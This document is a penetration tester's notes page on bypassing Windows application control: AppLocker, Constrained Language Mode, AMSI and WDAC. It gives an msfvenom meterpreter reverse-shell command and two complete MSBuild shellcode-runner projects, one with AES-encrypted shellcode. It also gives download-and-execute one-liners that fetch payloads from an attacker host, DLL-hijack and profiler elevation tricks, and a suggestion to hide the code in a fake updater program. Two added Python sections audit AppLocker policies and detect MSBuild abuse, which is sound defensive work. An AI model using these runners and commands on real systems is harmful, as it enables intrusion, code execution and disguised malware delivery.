xct's notes
Evasion & Bypasses

AppLocker

Writable directories in C:\Windows:
    C:\windows\tasks
Use trusted binaries (https://lolbas-project.github.io/) or find auto-elevating binaries with:
    findstr /C:"<autoElevate>true"
Then examine the library load order with procmon and check whether any path the binary searches for its libraries is writable. If such a path is writable, place a simple DLL there and it will be loaded and executed elevated. A nice post about this. Common target binaries:
    C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
    C:\Windows\SysWOW64\SystemPropertiesComputerName.exe
    C:\Windows\SysWOW64\SystemPropertiesHardware.exe
    C:\Windows\SysWOW64\SystemPropertiesProtection.exe
    C:\Windows\SysWOW64\SystemPropertiesRemote.exe

COR Profile

Create a DLL payload like this reverse shell and run:
    set COR_ENABLE_PROFILING=1
    set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
    set COR_PROFILER_PATH=<path>/pwn.dll
    tzsync

Enumerate AppLocker Rules

This can be important because certain executable names might be whitelisted!
    Get-AppLockerPolicy -Effective -Xml
or
    Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
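The writable-folder problem above and the exported policy are two halves of the same audit: the default AppLocker rule allows everything under %WINDIR%, which includes C:\Windows\Tasks. The following is an added example (not from the original notes) that parses a policy in the shape produced by Get-AppLockerPolicy -Effective -Xml and reports Allow path rules that cover a user-writable %WINDIR% subfolder without an exception for it; the sample policy and rule Ids are constructed, and path variables are compared literally rather than expanded.

```python
"""Audit an exported AppLocker policy (Get-AppLockerPolicy -Effective -Xml) for Allow
path rules that cover user-writable folders under %WINDIR% without an exception."""
import xml.etree.ElementTree as ET

# Folders under %WINDIR% that standard users can write to on a default install.
# C:\Windows\Tasks is the one named in the notes; Temp and tracing are well-known additions.
WRITABLE_WINDIR_SUBDIRS = [r"%WINDIR%\Tasks\*", r"%WINDIR%\Temp\*", r"%WINDIR%\tracing\*"]
# Constructed sample in the shape of the exported policy: the default "Windows folder"
# Exe rule with no exceptions, and a DLL rule that already excludes Tasks. Ids are made up.
SAMPLE_POLICY = """<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001"
        Name="(Default Rule) All files located in the Windows folder"
        UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Dll" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="Windows folder DLLs"
        UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>
      <Exceptions><FilePathCondition Path="%WINDIR%\\Tasks\\*" /></Exceptions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

def _prefix(path):
    """Normalise an AppLocker path pattern to a lower-case prefix (trailing '*' dropped).
    Path variables such as %WINDIR% are compared literally, not expanded."""
    return path.lower().replace("/", "\\").rstrip("*")

def covers(rule_path, target):
    """True if the rule pattern matches everything under target."""
    return _prefix(target).startswith(_prefix(rule_path))

def find_writable_gaps(policy_xml):
    """Return (collection type, rule name, writable folder) for each Allow path rule that
    covers a writable %WINDIR% subfolder and has no exception carving it out."""
    gaps = []
    for coll in ET.fromstring(policy_xml).findall("RuleCollection"):
        for rule in coll.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            allowed = [c.get("Path") for c in rule.findall("Conditions/FilePathCondition")]
            excepted = [c.get("Path") for c in rule.findall("Exceptions/FilePathCondition")]
            for folder in WRITABLE_WINDIR_SUBDIRS:
                if any(covers(p, folder) for p in allowed) and not any(covers(e, folder) for e in excepted):
                    gaps.append((coll.get("Type"), rule.get("Name"), folder))
    return gaps
```

Each reported gap is a folder to add as an Exceptions entry on that rule (or to cover with a Deny rule).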

PowerShell Constrained Language Mode (CLM)

All PowerShell modules in Covenant already bypass AppLocker/CLM because Covenant runs them in its own PowerShell runspace.
If PowerShell v2 is installed we can bypass CLM with it as well, because v2 does not support Constrained Language Mode.

AMSI

AMSI hooks Defender (or other AV engines) into PowerShell, .NET and other script hosts. A common bypass is to patch it in memory, since amsi.dll is loaded as a DLL into the user's own process.

Process Injection

Shellter (https://www.shellterproject.com/download/) can inject shellcode into legitimate 32-bit executables and is often not detected.

MSBuild Shellcode

Generate a payload for msbuild in csharp output format:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <num of iterations> > <out>.cs
Put the buffer into the template (be sure to change the payload buffer, the buffer size and some strings for AV evasion):
    <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
      <Target Name="Hello">
        <ClassExample />
      </Target>
      <UsingTask
        TaskName="ClassExample"
        TaskFactory="CodeTaskFactory"
        AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
        <Task>
          <Code Type="Class" Language="cs">
            <![CDATA[
            using System;
            using System.Runtime.InteropServices;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class ClassExample : Task, ITask
            {
                private static UInt32 MEM_COMMIT = 0x1000;
                private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

                [DllImport("kernel32")]
                private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
                    UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

                [DllImport("kernel32")]
                private static extern IntPtr CreateThread(
                    UInt32 lpThreadAttributes,
                    UInt32 dwStackSize,
                    UInt32 lpStartAddress,
                    IntPtr param,
                    UInt32 dwCreationFlags,
                    ref UInt32 lpThreadId
                );

                [DllImport("kernel32")]
                private static extern UInt32 WaitForSingleObject(
                    IntPtr hHandle,
                    UInt32 dwMilliseconds
                );

                public override bool Execute()
                {
                    // Paste the msfvenom csharp buffer here and set the array length to match.
                    byte[] shellcode = new byte[195] {};

                    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                        MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                    IntPtr hThread = IntPtr.Zero;
                    UInt32 threadId = 0;
                    IntPtr pinfo = IntPtr.Zero;
                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                    WaitForSingleObject(hThread, 0xFFFFFFFF);
                    return true;
                }
            }
            ]]>
          </Code>
        </Task>
      </UsingTask>
    </Project>
Download & Execute:
    Invoke-WebRequest "http://<ip>:<port>/<payload>.csproj" -OutFile "<outfile>.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\<outfile>.csproj

MSBuild Powershell

Use https://gist.github.com/xct/72cf74cc1187e1c088758bf8b4dc4086 and encode the PowerShell command with https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=d2hvYW1p . The C# part of this code is also well suited for embedding into fake Windows GUI programs (e.g. an updater).

MSBuild Encrypted Shellcode

We can combine an encrypted shellcode runner with MSBuild:
    <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
      <Target Name="Hello">
        <ClassExample />
      </Target>
      <UsingTask
        TaskName="ClassExample"
        TaskFactory="CodeTaskFactory"
        AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
        <Task>
          <Code Type="Class" Language="cs">
            <![CDATA[
            using System;
            using System.Diagnostics;
            using System.IO;
            using System.Runtime.InteropServices;
            using System.Security.Cryptography;
            using System.Threading;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class ClassExample : Task, ITask
            {
                [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
                static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
                [DllImport("kernel32.dll")]
                static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

                public override bool Execute()
                {
                    ManualResetEvent manualResetEvent = new ManualResetEvent(false);
                    // AES-256-CBC IV, key and ciphertext (elided here); see the C# section for the encryption side.
                    byte[] iv = new byte[16] { 0x30, ... };
                    byte[] key = new byte[32] { 0xe6, ... };
                    byte[] encrypted = new byte[512] { 0x68, 0x9d, 0xc1, ...};

                    Aes encryptor = Aes.Create();
                    encryptor.Mode = CipherMode.CBC;
                    encryptor.KeySize = 256;
                    encryptor.BlockSize = 128;
                    encryptor.Padding = PaddingMode.Zeros;
                    encryptor.Key = key;
                    encryptor.IV = iv;

                    MemoryStream memoryStream = new MemoryStream();
                    ICryptoTransform aesDecryptor = encryptor.CreateDecryptor();
                    CryptoStream cryptoStream = new CryptoStream(memoryStream, aesDecryptor, CryptoStreamMode.Write);

                    byte[] buf = null;
                    try
                    {
                        cryptoStream.Write(encrypted, 0, encrypted.Length);
                        cryptoStream.FlushFinalBlock();
                        buf = memoryStream.ToArray();
                    }
                    finally
                    {
                        memoryStream.Close();
                        cryptoStream.Close();
                    }

                    int size = buf.Length;
                    IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
                    Marshal.Copy(buf, 0, addr, size);
                    IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
                    manualResetEvent.WaitOne();
                    return true;
                }
            }
            ]]>
          </Code>
        </Task>
      </UsingTask>
    </Project>
To execute, fetch a "run.txt" (e.g. with curl) that contains:
    iwr http://<ip>/build.xml -OutFile c:\programdata\build.xml
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\programdata\build.xml
See the C# section for how to encrypt the shellcode for this variant.
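Both MSBuild variants above share the same telemetry shape: msbuild.exe launched from PowerShell with a project file that was just dropped into a user-writable location such as C:\ProgramData. The following detection logic is an added example (not from the original notes) that scores process-creation events on those two traits; the events are constructed with Sysmon Event ID 1 field names, and the project-path regex is a simplification that ignores quoted paths with spaces.

```python
"""Flag msbuild.exe launches of the kind described above (project file fetched to a
writable location, built from a PowerShell parent) in process-creation events."""
import re

# Locations a standard user can write to. A project built from here is a far stronger
# signal than a build inside a source checkout or a CI workspace.
WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\", "c:\\windows\\tasks\\")
# Parents that legitimately launch MSBuild; anything else (powershell, cmd, office) is odd.
BUILD_TOOL_PARENTS = ("devenv.exe", "msbuild.exe", "dotnet.exe")
# Simplified: a drive-rooted path without spaces ending in a project-style extension.
PROJECT_RE = re.compile(r'([a-z]:\\[^"\s]+?\.(?:csproj|vbproj|proj|targets|xml))', re.I)

# Constructed sample events using Sysmon Event ID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"msbuild.exe c:\programdata\build.xml"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Professional\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

def project_file(cmdline):
    """Lower-cased project/targets path from the command line, or None."""
    m = PROJECT_RE.search(cmdline)
    return m.group(1).lower() if m else None

def classify(event):
    """Reasons this event looks like MSBuild used as an application-control bypass."""
    if not event["Image"].lower().endswith("\\msbuild.exe"):
        return []
    reasons = []
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if parent not in BUILD_TOOL_PARENTS:
        reasons.append("msbuild.exe spawned by " + parent)
    proj = project_file(event["CommandLine"])
    if proj and proj.startswith(WRITABLE_PREFIXES):
        reasons.append("project file in user-writable path: " + proj)
    return reasons

def scan(events):
    """(command line, reasons) for every event that triggered at least one reason."""
    hits = []
    for e in events:
        reasons = classify(e)
        if reasons:
            hits.append((e["CommandLine"], reasons))
    return hits
```

On a host with no developers, a simpler but effective control is to block msbuild.exe outright in the AppLocker Exe collection, as the Microsoft recommended block rules do.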

WDAC

Check whether WDAC is enabled with Get-ComputerInfo (the last two lines, "DeviceGuardCodeIntegrity..."). The policies live in C:\Windows\System32\CodeIntegrity or in the EFI System Partition, which has no mounted drive letter by default:
    Get-Partition
    Get-Partition -PartitionNumber 2 | Set-Partition -NewDriveLetter X
    Get-PSDrive
    ls X:\EFI\Microsoft\Boot\*p7b

Convert via WDACTools

    ConvertTo-WDACCodeIntegrityPolicy -BinaryFilePath binpath -XmlFilePath xmlpath
LOLBAS lists a lot of AWL (application whitelisting) bypasses; some of them work against code integrity too.
PowerShell scripts are often "catalog" signed (C:\windows\system32\catroot), i.e. via a signed list of hashes.
Block rules for scripts are not very robust: small changes alter the hash and let the script run.
When we find a binary that uses PowerShell (and is allowed), we might be able to abuse the PowerShell module load order and place a malicious PowerShell file that gets auto-loaded.

Bypasses

This needs a vulnerable version; Microsoft has blocked a lot of versions. What we can do, however, is use an old version and remove a newline in the signature if it is embedded. The file stays validly signed but its hash changes, bypassing a hash-based block.

Resources

Device Guard
